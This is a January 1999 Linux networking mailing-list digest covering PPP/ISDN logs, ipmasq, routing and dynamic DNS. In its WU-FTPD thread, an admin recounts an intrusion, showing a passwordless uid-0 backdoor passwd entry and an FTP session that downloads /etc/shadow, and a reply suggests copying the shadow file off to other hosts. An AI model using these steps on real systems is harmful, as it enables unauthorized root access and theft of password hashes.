Linux-Networking Digest #892, Volume #9 Fri, 15 Jan 99 23:13:40 EST
Contents:
Re: PPP/ISDN Problems. Help! (Bill Shupp)
Re: Security hole with WU-FTPD ("Eugene")
Re: Security hole with WU-FTPD (Nama Gua)
Re: Want to do direct install of Redhat 5.2 via FTP since I have (Steve Dubay)
Recommendations for dynamic DNS service (esp for real domain + MX spool)? (Peter W)
Re: Revamped dialin server setup guide ("Charles Stack")
ipmasq mis-sources dns packets in demand dial configuration ("John J. Franey")
Re: Connecting my l.an (Shane & or Joanne Cunard)
Re: This is Linux, not Windows, so why not superior flexibility AND idiot-friendly?
(jedi)
Re: This is Linux, not Windows, so why not superior flexibility AND idiot-friendly?
(jedi)
Re: Security hole with WU-FTPD (Barry Margolin)
Best place for... ("Charles Stack")
----------------------------------------------------------------------------
From: [EMAIL PROTECTED] (Bill Shupp)
Subject: Re: PPP/ISDN Problems. Help!
Date: Thu, 14 Jan 1999 18:43:50 -0600
Thanks, but that didn't help. Here's a current log of what's going on
(slightly different):
Jan 14 18:42:47 bill ifup-ppp: pppd started for ppp1 on /dev/cua3 at 115200
Jan 14 18:42:47 bill pppd[15882]: pppd 2.3.3 started by root, uid 0
Jan 14 18:42:51 bill pppd[15882]: Serial connection established.
Jan 14 18:42:52 bill pppd[15882]: Using interface ppp0
Jan 14 18:42:52 bill pppd[15882]: Connect: ppp0 <--> /dev/cua3
Jan 14 18:42:52 bill pppd[15882]: sent [LCP ConfReq id=0x1 <asyncmap 0x0>
<magic 0xf66f> <pcomp> <accomp>]
Jan 14 18:42:52 bill pppd[15882]: rcvd [LCP ConfRej id=0x1 <pcomp> <accomp>]
Jan 14 18:42:52 bill pppd[15882]: sent [LCP ConfReq id=0x2 <asyncmap 0x0>
<magic 0xf66f>]
Jan 14 18:42:53 bill pppd[15882]: rcvd [LCP ConfReq id=0x1 < 00 04 00 00>
<auth pap> <asyncmap 0x0>]
Jan 14 18:42:53 bill pppd[15882]: sent [LCP ConfRej id=0x1 < 00 04 00 00>]
Jan 14 18:42:53 bill pppd[15882]: rcvd [LCP ConfAck id=0x2 <asyncmap 0x0>
<magic 0xf66f>]
Jan 14 18:42:53 bill pppd[15882]: rcvd [LCP ConfReq id=0x2 <auth pap>
<asyncmap 0x0>]
Jan 14 18:42:53 bill pppd[15882]: sent [LCP ConfAck id=0x2 <auth pap>
<asyncmap 0x0>]
Jan 14 18:42:53 bill pppd[15882]: sent [PAP AuthReq id=0x1 user="bills"
password="XXXXXXXX"]
Jan 14 18:42:53 bill pppd[15882]: rcvd [PAP AuthAck id=0x1 ""]
Jan 14 18:42:53 bill pppd[15882]: Remote message:
Jan 14 18:42:53 bill pppd[15882]: sent [IPCP ConfReq id=0x1 <addr
207.55.129.64> <compress VJ 0f 01>]
Jan 14 18:42:53 bill pppd[15882]: rcvd [LCP TermReq id=0x1]
Jan 14 18:42:53 bill pppd[15882]: LCP terminated by peer
Jan 14 18:42:53 bill pppd[15882]: sent [LCP TermAck id=0x1]
Jan 14 18:42:53 bill pppd[15882]: Modem hangup
Jan 14 18:42:53 bill pppd[15882]: Connection terminated.
Jan 14 18:42:54 bill pppd[15882]: Exit.
In article <77lube$[EMAIL PROTECTED]>, [EMAIL PROTECTED] (Clifford
Kite) wrote:
> Bill Shupp ([EMAIL PROTECTED]) wrote:
>
> : I'm trying to connect my Linux machine, which has an external 3Com Impact
> : IQ ISDN Terminal Adapter, to an Ascend Pipeline 50. Below is what appears
> : in the log when dbug is on. It's hanging up as soon as I send my IP
> : address.
>
> : I can connect to another ISP (which has a Pipeline 75) just fine. Any
>
> : Jan 13 22:40:28 bill pppd[6927]: pppd 2.3.3 started by root, uid 0
> : Jan 13 22:40:28 bill ifup-ppp: pppd started for ppp1 on /dev/cua3 at 115200
> : Jan 13 22:40:32 bill pppd[6927]: Serial connection established.
> : Jan 13 22:40:33 bill pppd[6927]: Using interface ppp0
> : Jan 13 22:40:33 bill pppd[6927]: Connect: ppp0 <--> /dev/cua3
> : Jan 13 22:40:33 bill pppd[6927]: sent [LCP ConfReq id=0x1 <magic
> : 0xffff85d3> <pcomp> <accomp>]
> : Jan 13 22:40:33 bill pppd[6927]: rcvd [LCP ConfRej id=0x1 <pcomp> <accomp>]
> : Jan 13 22:40:33 bill pppd[6927]: sent [LCP ConfReq id=0x2 <magic
0xffff85d3>]
> : Jan 13 22:40:33 bill pppd[6927]: rcvd [LCP ConfReq id=0x1 < 00 04 00 00>
> : <auth pap> <asyncmap 0x0>]
>
> The thing I would try first is to set the pppd option <asyncmap 0>.
> The ISP ppp is likely slightly broken and assumes you will accept this
> asyncmap configuration for negotiations beyond the LCP stage. If you
> don't set the asyncmap, then the default ffffffff is supposed to be used.
> An additional benefit of the <asyncmap 0> is that the data transfer
> speed is increased - by 15 to 20 percent I think.
>
> I would get rid of any "escape FF" pppd option too.
>
> : Jan 13 22:40:33 bill pppd[6927]: sent [LCP ConfRej id=0x1 < 00 04 00 00>]
> : Jan 13 22:40:33 bill pppd[6927]: rcvd [LCP ConfAck id=0x2 <magic
0xffff85d3>]
> : Jan 13 22:40:33 bill pppd[6927]: rcvd [LCP ConfReq id=0x2 <auth pap>
> : <asyncmap 0x0>]
> : Jan 13 22:40:33 bill pppd[6927]: sent [LCP ConfAck id=0x2 <auth pap>
> : <asyncmap 0x0>]
> : Jan 13 22:40:33 bill pppd[6927]: sent [PAP AuthReq id=0x1 user="bills"
> : password="XXXXXXXX"]
> : Jan 13 22:40:34 bill pppd[6927]: rcvd [PAP AuthAck id=0x1 ""]
> : Jan 13 22:40:34 bill pppd[6927]: Remote message:
> : Jan 13 22:40:34 bill pppd[6927]: sent [IPCP ConfReq id=0x1 <addr
> : 207.55.129.64> <compress VJ 0f 01>]
>
> Every think is OK until here where IPCP negotiation begins, a sign of
> an asyncmap problem.
>
> <snip>
>
> --
> Clifford Kite <[EMAIL PROTECTED]> Not a guru. (tm)
> /* The wealth of a nation is created by the productive labor of its
> * citizens. */
------------------------------
From: "Eugene" <[EMAIL PROTECTED]>
Crossposted-To:
comp.security,comp.security.unix,redhat.general,redhat.networking.general,aus.computers.linux
Subject: Re: Security hole with WU-FTPD
Date: Fri, 15 Jan 1999 20:02:18 -0500
what else did you expect???
where in the world did you see *root access to ftp* ?????
by default root ftp logins are *disabled*
you crippled the security
Daryle Niedermayer wrote in message <[EMAIL PROTECTED]>...
>We had a hacker exploit a weakness in the WU-FTP daemon last night. The
>exploit on a machine named "bob" from a machine named "neale"went like
>this:
>
>Here's how part of the exploit happened:
>
>By adding an entry to the bottom of the passwd file:
>test::0:0:dummyname:/:/bin/bash
>
>without a password marker, our login scripts will not let you login with
>a
>shell, but they will let you open an ftp connection with root
>permissions.
>
>You can then upload or download any file you want. ftp will allow you to
>
>login with a null password so you do not need access to the shadow file
>to
>exploit this weakness, as the following transcript will show:
>
>neale[29]% ftp bob
>Connected to bob....
>220 bob... FTP server (Version wu-2.4.2-academ[BETA-15](1) Sat Nov
>1 03:08:32 EST 1997) ready.
>Name (bob:dniederm): test
>331 Password required for test.
>Password:
>230 User test logged in.
>Remote system type is UNIX.
>Using binary mode to transfer files.
>ftp> cd /etc/
>250 CWD command successful.
>ftp> get shadow
>local: shadow remote: shadow
>200 PORT command successful.
>150 Opening BINARY mode data connection for shadow (1117 bytes).
>226 Transfer complete.
>1117 bytes received in 0.00159 secs (6.8e+02 Kbytes/sec)
>ftp> bye
>221 Goodbye.
>neale[30]% whoami
>dniederm
>neale[31]% more shadow
>...
>the contents of the shadow file including encrypted passwords would
>follow.
>
>The fact that the shadow file is not root writable. Would not have saved
>it. Once root access is gained in this way, putting the shadow file back
>raises not problems with overwriting a file with 0400 permissions.
>Upgrading to BETA-18 (the latest available rpm still permitted this
>exploit. The software was installed as part of the default set of rpms
>in a Redhat Linux 5.0 distribution.
>
>We are still working to uncover how the hacker managed to append a
>passwd entry to the /etc/passwd file. (I'm open to suggestions--at the
>time of the attack, bob was set up to be an NFS client but we do not use
>NFS in our domain as so it may not have been configured properly. NFS
>has since been removed).
>
>We have since replaced wu-ftp with a different ftp server. Here again I
>am open to suggestions as to the best low-cost (or no-cost) ftpd
>available apart from wu-ftp.
>
>--
>
>********************************
>Daryle Niedermayer
>Programmer/Analyst
>GDS & Associates Systems. Ltd.
>400 - 4211 Albert St.
>Regina, SK Canada -- S4S 3R6
>Phone: 306.586.7832
>Fax: 306.585.1514
>email: [EMAIL PROTECTED]
>http://www.gds.ca
>********************************
>
>
------------------------------
From: Nama Gua <[EMAIL PROTECTED]>
Crossposted-To:
comp.security,comp.security.unix,redhat.general,redhat.networking.general,aus.computers.linux
Subject: Re: Security hole with WU-FTPD
Date: Sat, 16 Jan 1999 09:02:59 +0800
>
> By adding an entry to the bottom of the passwd file:
> test::0:0:dummyname:/:/bin/bash
>
If he/she got the root access, why bother adding new account to ftp?
cp /etc/shadow filename
then ftp filename to other hosts.
Fredy
------------------------------
From: Steve Dubay <[EMAIL PROTECTED]>
Crossposted-To:
linux.redhat.install,comp.os.linux.questions,comp.os.linux.hardware,comp.os.linux.setup
Subject: Re: Want to do direct install of Redhat 5.2 via FTP since I have
Date: Fri, 15 Jan 1999 01:09:25 GMT
Dude are you on some sort of medication. If so, can I get some.. I would
love to be that amped up all the time.
Don't blow a blood vessel.
DG wrote:
> I did not buy the 7.5 GB hard drive. If you want me to, I'll kicj your
> sorry little a** and toss your s*** away !!!
>
> On Tue, 05 Jan 1999 03:28:17 +0000, Michel Catudal
> <[EMAIL PROTECTED]> wrote:
>
> >THE DUNGEONS OF DOOOOOOOOOOM wrote:
> >>
> >> P.S:
> >> PLEASE DO NO TELL ME TO USE ANOTHER VERSION OF UNIX SINCE I KINDA AM
> >> USED TO RH LINUX. ALSO, PLEASE DO NOT TELL ME HOW TO PARTITION MY HARD
> >> DRIVE SINCE MY 75. GB HARD DRIVE IS NEARLY FILLED UP. I PLAN TO
> >> INSTALL REDHAT LINUX 5.2 TO MY OLDER 730 MB HARD DRIVE SO PLEASE DO
> >> NOT BRING IN 7.5 GB INTO THE PICTURE UNLESS YOU ARE GONNA GIVE ME A
> >> FREE CD-RW DRIVE FIRST !!!
> >
> >The only logical solution is to repartition your 7.5G hard drive.
> >Toss that old shit and buy partition magic. You'll find it to
> >be the best buy you will have done in years. If you could afford
> >to buy a 7.5G I'm sure you can afford the $50 or so for partition
> >magic and $1.99 for RedHAT 5.2.
> >
> >--
> >Tann� du plantage avec Ti-Mou?
> >Alors essayez donc Linux ou OS/2
> >http://www.netonecom.net/~bbcat/
> >We have software, food, music, news, search,
> >history, electronics and genealogy pages.
------------------------------
From: Peter W <[EMAIL PROTECTED]>
Subject: Recommendations for dynamic DNS service (esp for real domain + MX spool)?
Date: Fri, 15 Jan 1999 21:11:04 -0500
I'd like to get a domain name with DNS handled by a dynamic DNS service, and
that service also handling secondary mail spooling when I am offline. First I
looked at DDNS.org but after having some trouble downloading clients I started
doing some tests: they seem sluggish, maybe overloaded (or maybe it's a
geographic/routing problem). I suspect that DDNS might be overwhelmed since they
do have some free services and ML.org is defunct.
Another option is dyndns.com. A llittle more expensive but I'm not sure about
the services they offer. Performance seems much better in any case.
Does anyone have any recommendations to make?
Thanks,
-Peter
(remove the obvious anit-spam stuff from my address to reply via email)
------------------------------
From: "Charles Stack" <[EMAIL PROTECTED]>
Subject: Re: Revamped dialin server setup guide
Date: Fri, 15 Jan 1999 21:43:57 -0500
Nice Job, Josh!
The correct URL for this document is:
http://www.swcp.com/~jgentry/dialin2.html
Charles
------------------------------
From: "John J. Franey" <[EMAIL PROTECTED]>
Subject: ipmasq mis-sources dns packets in demand dial configuration
Date: Fri, 15 Jan 1999 21:53:33 -0500
Reply-To: [EMAIL PROTECTED]
linux kernel 2.0.34, RedHat 5.1.
Problem: Outgong packets are re-sourced with another, wrong, ip address,
not the current
(dynamic address allocation), correct, ip address. Instead,
of using current ppp address, the ipmasq software uses another one.
Sometimes
it uses a previously used local ip address. Sometimes it uses the ip
address of
diald's pseudo sl0 interface.
We detected this behavior due to our fw configuration. In our
ip-local.up script,
we deny all outgoing traffic (via ipfwadm) to the ppp interface except
for the newly attained local ip address as the source:
ipfwadm -O -p deny
ipfwadm -O -a acc -W ppp0 -S $(NEWIPADDRESS)/32 -D 0.0.0.0/0
ipfwadm -O -a deny -S 0.0.0.0/0 -D 0.0.0.0/0 -o
Hence, while the forwarder is sending with a source of the wrong ip
address, we see denial messages in log file.:
"deny ppp0 udp wrong.ip.address remote.dns.srver.addr"
Also, we don't see responses to our internal nameserver requests to root
servers.
The problem is severe because it impacts our internal name server. Our
internal
name server is unable to resolve names by forwarding request to root
servers while
this condition exists. (I'm not altogether clear on the ttl algorithm
used by our name
server, but eventually, over a time of about an hour or so, it
apparently gives up the
ghost on these root name servers. But later is able to access
them...... As a by
product of your help in this matter, I'd like to better understand name
server bahavior.
Our name server is running on SUNOS 5.4).
In this condition, our internal name server is unable to forward
requests to external root
servers, BUT, other ip traffic is working fine. Pings/telnet/ftp/http
to cached named hosts
work. Pings/telnet/ftp/http to explicit ip addresses work. nslookup
pointing at root name
server works. unix resolver's, pointing to the external name servers in
addition to the local
name server, work.
I'm suspicious that our diald configuration confuses the ipmasq
software, but do not
understand the implementation of diald or ipmasq well enough to decide
to
pursue or to ignore my suspicion.
The ip masq algorithm requires the local ppp address. How and when does
it retrieve it?
In other words, after the ppp link comes up, what is invoked to drop the
new ip address
into the kernel for the forwarder to use? Does pppd put the ip address
into the kernel? Or
does ipmasq call into user space for the data?
Does the ipmasq software cache ip addresses? Its using a stale ip
address it might be that
a cache isn't flushed. How can the cache be flushed?
Are diald and ipmasq conspiring together in a way
yet to be revealed to me that prevents ipmasq from using the current ip
address?
We use the ip masq from the RedHat 5.1 rpms
and demand dial via diald (0.16.5). Our link is a POTS (plain old
telephone server)
analog modem (not isdn, yada, yada).
Thanks,
John
------------------------------
Date: Fri, 15 Jan 1999 09:58:25 +0800
From: Shane & or Joanne Cunard <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
Subject: Re: Connecting my l.an
Have a look in /etc/rc.d/net2.rc (I'm not sure if that filename is quite
right) thats where you need to put these commands.
"G. G. Flatman" wrote:
> Hello,
> I have 4 machines on my lan they are all networked thru my
> hub Linux box hs the ppp connection to the Internet along with being
> connected to my hub on the Lan i am presently reading the NET-3 how to
> page but i am confuse at one part do i need to put the following in a
> file and where is that file located or do i just type it in on the
> command line.
>
> root# route add -net 192.168.1.0 netmask 255.255.255.0 eth0
> root# route add -net 192.168.2.0 netmask 255.255.255.0 eth1
> root# route add -net 192.168.3.0 netmask 255.255.255.0 eth2
> root# route add default ppp0
>
> or am i missing some thing here.
> --
> George Flatman
> [EMAIL PROTECTED]
> [EMAIL PROTECTED]
> [EMAIL PROTECTED]
------------------------------
From: [EMAIL PROTECTED] (jedi)
Crossposted-To:
comp.os.linux.misc,comp.os.linux.portable,comp.os.linux.powerpc,comp.os.linux.setup
Subject: Re: This is Linux, not Windows, so why not superior flexibility AND
idiot-friendly?
Date: Fri, 15 Jan 1999 18:49:30 -0800
On 16 Jan 1999 01:01:57 GMT, Gregory Loren Hansen <[EMAIL PROTECTED]>
wrote:
>In article <77ofit$h87$[EMAIL PROTECTED]>, rob <[EMAIL PROTECTED]> wrote:
>>
>>So true - what you use is what you like. A foreign graduate student here
>>was all frustrated with windows because he was used to UNIX and coudn't
>>figure out how to grep in windows.
>
>Can you?
Is there anything outside of a ported unix tool
that does regular expressions in Windows?
--
Herding Humans ~ Herding Cats
Neither will do a thing unless they really want to, or |||
is coerced to the point where it will scratch your eyes out / | \
as soon as your grip slips.
In search of sane PPP docs? Try http://penguin.lvcm.com
------------------------------
From: [EMAIL PROTECTED] (jedi)
Crossposted-To:
comp.os.linux.misc,comp.os.linux.portable,comp.os.linux.powerpc,comp.os.linux.setup
Subject: Re: This is Linux, not Windows, so why not superior flexibility AND
idiot-friendly?
Date: Fri, 15 Jan 1999 18:48:53 -0800
On 15 Jan 1999 17:08:22 -0800, Phil Stripling <[EMAIL PROTECTED]> wrote:
>[EMAIL PROTECTED] (Peter Sch�ller) writes:
>
>> [EMAIL PROTECTED] (MalkContent) writes:
[deletia]
>> > So until Linux can accomdated that kind of user, as well as power users,
>> > it's going to have a hard time becoming the dominant desktop OS.
>>
>> If a company's computer users are that ignorant, they should not have
>> general purpose computer OSes put in front of them.
>
>I _think_ this may be the elitism mentioned by Mr. Malkcontent, no?
No, THERE IS a point at which the user shell, no matter
how simple will simply not make up for the fact that there
is no intellegence coming from the operator.
>Although you may disagree that Windows/MacOS are more user friendly, many
>seem to think otherwise, including me, by the way. Preferring DOS to Mac
>speaks of your approach to computing, not to objective ease of use. I _do_
>think that the Mac OS is, objectively, easier to use than Un*x. And I have
That's more a matter of quality control and can be quite
easily replicated by commercial unix vendors that can exert
the same kinds of control over their systems as Apple can.
Microsoft doesn't have that and much of it's problems relative
to the MacOS in may ways are due to that. Even motherboard
components on PC's vary.
>the impression that the elitists (see above) would prefer that the various
>flavors of Un*x, including Linux, remain their exclusive domain, while
>sneering at "the rest of us." :-> I am just one of the ignorant horde that
>do not deserve Linux.
>
>I have to say I agree with the general drift of his comments:
>Until Linux can be installed on home computers as easily as putting the
>CD-ROM in the tray and clicking OK, Linux will stay a niche OS for -- well,
The lack of that never stopped Windows or DOS. The MacOS is
not really a market relevant example in this sort of thing.
Although, one can luck out with either Windows or Linux and have
the installer do all the work. Similarly, both can tank on you.
The same can be said of BeOS as well.
>I started to say elitists, but that is not fair. Let us say it will stay a
>niche OS for people who are more interested in being able to run the OS
>than in being able to get something done with it.
That depends on rather or not crashes and configuration
corruption and poor concurrency in general tend to
interfere with things getting done.
I already did the single-tasking thing on a 1M 68000/8.
I expect better these days & WinDOS gave me all the training
necessary (ironic as hell).
>
>Until the elite can come up with a general purpose OS that the ignorant
>are worthy to have in front of them, the great unwashed are not going to
>be using Linux. And it is the great unwashed that drive the market for
>software that drives the market for OSes. It is the great unwashed that
>is voting for Windows.
Your view of Windows is rather out of touch with reality.
What Windows and DOS always had going for it was 'all the
apps'.
That's why cheaper, faster, easier platforms never made a dent.
--
Herding Humans ~ Herding Cats
Neither will do a thing unless they really want to, or |||
is coerced to the point where it will scratch your eyes out / | \
as soon as your grip slips.
In search of sane PPP docs? Try http://penguin.lvcm.com
------------------------------
From: Barry Margolin <[EMAIL PROTECTED]>
Crossposted-To:
comp.security,comp.security.unix,redhat.general,redhat.networking.general,aus.computers.linux
Subject: Re: Security hole with WU-FTPD
Date: Sat, 16 Jan 1999 03:19:07 GMT
In article <[EMAIL PROTECTED]>,
Nama Gua <[EMAIL PROTECTED]> wrote:
>If he/she got the root access, why bother adding new account to ftp?
>cp /etc/shadow filename
>then ftp filename to other hosts.
When you get root access, it's common to leave backdoors to make it easier
to get in the next time, in case they close the original hole.
--
Barry Margolin, [EMAIL PROTECTED]
GTE Internetworking, Powered by BBN, Burlington, MA
*** DON'T SEND TECHNICAL QUESTIONS DIRECTLY TO ME, post them to newsgroups.
Don't bother cc'ing followups to me.
------------------------------
From: "Charles Stack" <[EMAIL PROTECTED]>
Subject: Best place for...
Date: Thu, 14 Jan 1999 21:40:06 -0500
Running RedHat 5.2 with IP Mascarade. Used linuxconfig to setup my ppp
scripts (which can be started with usernet &).
Where is the best place to call a script that sets up IP Mascarade? I'd
like this done at startup.
My script looks like:
#!/bin/sh
/sbin/modprobe ip_masq_ftp
/sbin/modprobe ip_masq_irc
echo "1" >/proc/sys/net/ipv4/ip_forward
/sbin/ipfwadm -F -p deny
/sbin/ipfwadm -F -a m -S 192.168.0.1/24 -D 0.0.0.0 #my Winblows machine
Where is the best place to call script whenever ppp starts and stops?
I though about /etc/ppp/ip-up and /etc/ppp/ip-down but I'm not sure it's
being executed when called by the scripts setup with linuxconf.
Thanks.
Charles
------------------------------
** FOR YOUR REFERENCE **
The service address, to which questions about the list itself and requests
to be added to or deleted from it should be directed, is:
Internet: [EMAIL PROTECTED]
You can send mail to the entire list (and comp.os.linux.networking) via:
Internet: [EMAIL PROTECTED]
Linux may be obtained via one of these FTP sites:
ftp.funet.fi pub/Linux
tsx-11.mit.edu pub/linux
sunsite.unc.edu pub/Linux
End of Linux-Networking Digest
******************************
